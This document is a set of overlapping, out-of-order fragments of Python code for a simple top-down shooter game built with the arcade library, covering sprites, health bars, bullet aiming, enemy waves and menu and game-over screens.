"red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED)",
"the mouse the destination location for the bullet dest_x = x dest_y =",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy)",
"initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() # Variables that will hold sprite lists self.player_list",
"player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x bullet.center_y",
"= False else: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"Class that manages the 'menu' view. \"\"\" def on_show(self): \"\"\" Called when switching",
"self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self,",
"Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call the parent",
"key, modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key == arcade.key.UP:",
"Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE) super().__init__() #",
"self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good = True self.window.level",
"def enemy_draw_health_bar(self): # Draw the health bar # Draw the red background if",
"center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a",
"SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0:",
"health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health",
"rotation. Change this, and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite):",
"arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound = arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False",
"= ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y =",
"and the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells",
"enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list) == 0",
"0: self.level = self.updated_level + 1 else: self.good = False else: for i",
"sprite if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") #",
"Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25",
"== 0: self.window.level = self.updated_level + 1 else: self.good = False def setup(self):",
"width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse",
"bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view",
"self.change_y # Check for out-of-bounds if self.left < 0: self.left = 0 elif",
"color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the health bar # Draw the red background",
"# Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health = enemy_max_health def",
"< self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based",
"the enemy to the lists self.enemy_list.append(enemy) if self.enemy_list == 0: self.window.level = self.updated_level",
"if not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") # Remove",
"self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies",
"remove it. if bullet.bottom > self.width or bullet.top < 0 or bullet.right <",
"def on_update(self, delta_time): \"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y",
"the sprite rotation. Change this, and the sprite rotates. self.angle += self.change_angle def",
"bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse the destination",
"+ 1 else: self.good = False def setup(self): # Set up the game",
"key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed = True",
"up the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list",
"angle = math.atan2(y_diff, x_diff) # Taking into account the angle, calculate our change_x",
"= math.sin(angle) * BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def",
"import random import arcade import math import os from arcade.color import BLACK, WHITE",
"\"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self):",
"- 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate",
"= 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and",
"0 elif self.top > SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class",
"self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the",
"the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20)",
"player_max_health def player_draw_health_number(self): # Draw how many health the enemies have health_string =",
"start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the",
"arcade.draw_text(\"Use the arrow keys on your keyboard to move around\", start_x, start_y, arcade.color.RED,",
"= True elif key == arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT:",
"= math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet",
"enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite) # update all sprites self.bullet_list.update() if len(self.enemy_list)",
"= 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite =",
"attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw",
"370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x",
"= -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image,",
"super().__init__() # Variables that will hold sprite lists self.player_list = None self.enemy_list =",
"to the main menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView()",
"dest_y - start_y angle = math.atan2(y_diff, x_diff) # Taking into account the angle,",
"= random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the",
"+ 1 else: self.good = False else: for i in range(self.amount_of_enemies): # Create",
"player around the screen self.center_x += self.change_x self.center_y += self.change_y # Check for",
"= 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT =",
"# update all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level:",
"calculate our change_x # and change_y. Velocity is how fast the bullet travels.",
"self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for enemy in",
"player_draw_health_number(self): # Draw how many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x",
"SCREEN_WIDTH, SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output =",
"update(self): \"\"\" Move the player \"\"\" # Move player around the screen self.center_x",
"0 or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window",
"= start_y # Get from the mouse the destination location for the bullet",
"enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the",
"Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2,",
"flies off-screen, remove it. if bullet.bottom > self.width or bullet.top < 0 or",
"arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x =",
"def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key. \"\"\" if",
"many health the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y =",
"health_width = (HEALTHBAR_WIDTH +50) * (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH",
"arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 #",
"+= min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y",
"player_max_health self.player_cur_health = player_max_health def player_draw_health_number(self): # Draw how many health the enemies",
"player_max_health): super().__init__(image, scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health",
"= dest_x - start_x y_diff = dest_y - start_y angle = math.atan2(y_diff, x_diff)",
"# Loop through each bullet for bullet in self.bullet_list: # Check this bullet",
"in self.bullet_list: # Check this bullet to see if it hit a enemy",
"# Calculate width based on health start_x = 85 start_y = 25 health_width",
"_modifiers): \"\"\" If user hits escape, go back to the main menu view",
"PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys",
"random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x",
"based on health health_width = HEALTHBAR_WIDTH * (self.enemy_cur_health / self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5",
"MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer",
"self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\") self.gameOver_sound",
"HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class",
"50) self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use",
"the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\")",
"enemies have health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12,",
"color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key is",
"if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x >",
"= False self.right_pressed = False self.up_pressed = False self.down_pressed = False self.width =",
"class has an \"angle\" attribute that controls # the sprite rotation. Change this,",
"from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 =",
"key, _modifiers): \"\"\" If user hits escape, go back to the main menu",
"= arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current location start_x",
"# start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, # start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def",
"to advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run()",
"= True def on_key_release(self, key, modifiers): \"\"\"Called when the user releases a key.",
"enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x =",
"on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50) *",
"self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10,",
"SCREEN_HEIGHT, self.background) # Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level:",
"self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1 # Make sure",
"scale) # Add extra attributes for health self.player_max_health = player_max_health self.player_cur_health = player_max_health",
"25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12)",
"off the screen if self.bottom < 0: self.bottom = 0 elif self.top >",
"+ HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate width based on health health_width =",
"= 0 elif self.right > SCREEN_WIDTH - 1: self.right = SCREEN_WIDTH - 1",
"enemy_max_health self.enemy_cur_health = enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies",
"elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen",
"x dest_y = y # Do math to calculate how to get the",
"font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health bar # Draw the red",
"arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use",
"main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif",
"to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\"",
"one health point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0:",
"start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self, _x,",
"self.center_y += self.change_y # Check for out-of-bounds if self.left < 0: self.left =",
"modifiers): \"\"\"Called when the user releases a key. \"\"\" if key == arcade.key.UP:",
"600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH =",
"height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move",
"not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED",
"# start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, # font_size=12, # color=arcade.color.WHITE) def player_draw_health_bar(self): # Draw the",
"Class to manage the game over view \"\"\" def on_show(self): \"\"\" Called when",
"\"\"\" Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if",
"we hit, process for enemy in hit_list: # Make sure this is the",
"SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE",
"MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) #",
"/ self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width,",
"if self.left_pressed and not self.right_pressed: self.player_sprite.change_x = -MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed:",
"0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15",
"Make sure he cant go off the screen if self.bottom < 0: self.bottom",
"and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for",
"= 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED",
"def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back to the",
"1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the",
"the bullet flies off-screen, remove it. if bullet.bottom > self.width or bullet.top <",
"elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x <",
"dest_y = y # Do math to calculate how to get the bullet",
"BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 =",
"ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3)",
"MyGame(arcade.View): \"\"\" Main application class. \"\"\" def __init__(self): \"\"\" Initializer \"\"\" # Call",
"arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\",",
"SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You died",
"= self.player_sprite.center_y bullet.center_x = start_x bullet.center_y = start_y # Get from the mouse",
"# Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list:",
"start_x = 290 start_y = 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y,",
"= 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395,",
"self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in",
"point player.player_cur_health -= 1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over",
"the enemies have health_string = f\"{self.player_cur_health}/{self.player_max_health}\" start_x = 25 start_y = 40 arcade.draw_text(health_string,",
"15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\", start_x, start_y, arcade.color.RED,",
"enemy_max_health def enemy_draw_health_number(self): # Draw how many health the enemies have health_string =",
"in self.enemy_list: enemy.follow_sprite(self.player_sprite) for enemy2 in self.enemy_list: enemy2.follow_sprite(self.player_sprite) for enemy3 in self.enemy_list: enemy3.follow_sprite(self.player_sprite)",
"= -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y = -25 MOVEMENT_SPEED = 5 class PLAYER(arcade.Sprite):",
"start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to Shoot\",",
"the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED bullet.change_y = math.sin(angle) * BULLET_SPEED",
"Movement and game logic \"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed",
"health_string = f\"{self.enemy_cur_health}/{self.enemy_max_health}\" arcade.draw_text(health_string, start_x=self.center_x + HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def",
"arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go",
"advance to the 'game' view. \"\"\" game_view = MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class",
"dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list: # Check",
"> player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x) def __init__(self, image, scale, enemy_max_health):",
"self.window.level <= 3: for i in range(self.amount_of_enemies): # Create the enemy image enemy",
"len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process for enemy",
"math to calculate how to get the bullet to the destination. x_diff =",
"health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <= 0: #",
"def player_draw_health_bar(self): # Draw the health bar # Draw the red background start_x",
"# Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list == 0:",
"if self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed:",
"= 10 self.good = True self.window.level = 1 self.updated_level = -1 self.amount_of_enemies =",
"if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application",
"sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must be all ints\") #",
"setup(self): # Set up the game # Sprite lists self.window.level = 1 self.player_list",
"health bar # Draw the red background if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y",
"random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y",
"random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy",
"this is the right sprite if not isinstance(enemy, ENEMY): raise TypeError(\"List contents must",
"hit_list = arcade.check_for_collision_with_list(bullet, self.enemy_list) # If it did, get rid of the bullet",
"0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: #",
"hit_list: # Make sure this is the right sprite if not isinstance(enemy, ENEMY):",
"enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2)",
"> self.width: bullet.remove_from_sprite_lists() def main(): window = arcade.Window(SCREEN_WIDTH, SCREEN_HEIGHT, \"Shooter Game\") menu_view =",
"to go to the main guy if self.center_y < player_sprite.center_y: self.center_y += min(SPRITE_SPEED,",
"the angle, calculate our change_x # and change_y. Velocity is how fast the",
"True elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called",
"10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player around",
"5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra",
"health bar # Draw the red background start_x = 120 start_y = 35",
"0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level",
"self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels()",
"cant go off the screen if self.bottom < 0: self.bottom = 0 elif",
"variable self.background = None def levels(self): while self.good: if self.window.level >= 0 and",
"3 and self.window.level < 6: for i in range(self.amount_of_enemies): # Create the enemy",
"1 # Check health if player.player_cur_health <= 0: arcade.play_sound(self.gameOver_sound) game_over = GameOverView() self.window.show_view(game_over)",
"elif key == arcade.key.RIGHT: self.right_pressed = True def on_key_release(self, key, modifiers): \"\"\"Called when",
"__init__(self): \"\"\" Initializer \"\"\" # Call the parent class initializer #super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)",
"arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound = arcade.load_sound(\"shooting_game/assets/sounds/death.wav\")",
"self.good = True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20",
"in self.player_list: player.player_draw_health_number() player.player_draw_health_bar() for enemy in self.enemy_list: enemy.enemy_draw_health_number() enemy.enemy_draw_health_bar() def on_mouse_press(self, x,",
"the health bar # Draw the red background start_x = 120 start_y =",
"based on health start_x = 85 start_y = 25 health_width = (HEALTHBAR_WIDTH +50)",
"= 25 start_y = 40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE,",
"enemy we hit, process for enemy in hit_list: # Make sure this is",
"color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view. \"\"\" def on_show(self):",
"arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def",
"\"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED,",
"= x dest_y = y # Do math to calculate how to get",
"MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game = MyGame() # game.setup() #",
"- 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class",
"will be stored in this variable self.background = None def levels(self): while self.good:",
"self.player_sprite = None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good",
"the sprite rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the",
"be stored in this variable self.background = None def levels(self): while self.good: if",
"= 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background",
"self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key,",
"+ 10, color=arcade.color.GREEN) def update(self): \"\"\" Move the player \"\"\" # Move player",
"_x, _y, _button, _modifiers): \"\"\" Use a mouse press to advance to the",
"# Create the enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) # Position the",
"enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y",
"all sprites self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level +=",
"game over view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\"",
"If user hits escape, go back to the main menu view \"\"\" if",
"when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\"",
"the player \"\"\" # Move player around the screen self.center_x += self.change_x self.center_y",
"Draw all the sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12,",
"bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit, process",
"view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220",
"player_hit = arcade.check_for_collision_with_list(enemy, self.player_list) if len(player_hit) > 0: enemy.remove_from_sprite_lists() for player in player_hit:",
"400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color self.background =",
"player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x - player_sprite.center_x)",
"player_max_health=10) start_x = 208 start_y = 270 arcade.draw_text(\"Use the arrow keys on your",
"- health_width), start_y , width=health_width + 10, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.GREEN) def update(self):",
"view \"\"\" def on_show(self): \"\"\" Called when switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def",
"HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH + 60, height=HEALTHBAR_HEIGHT + 10, color=arcade.color.RED) # Calculate width based on",
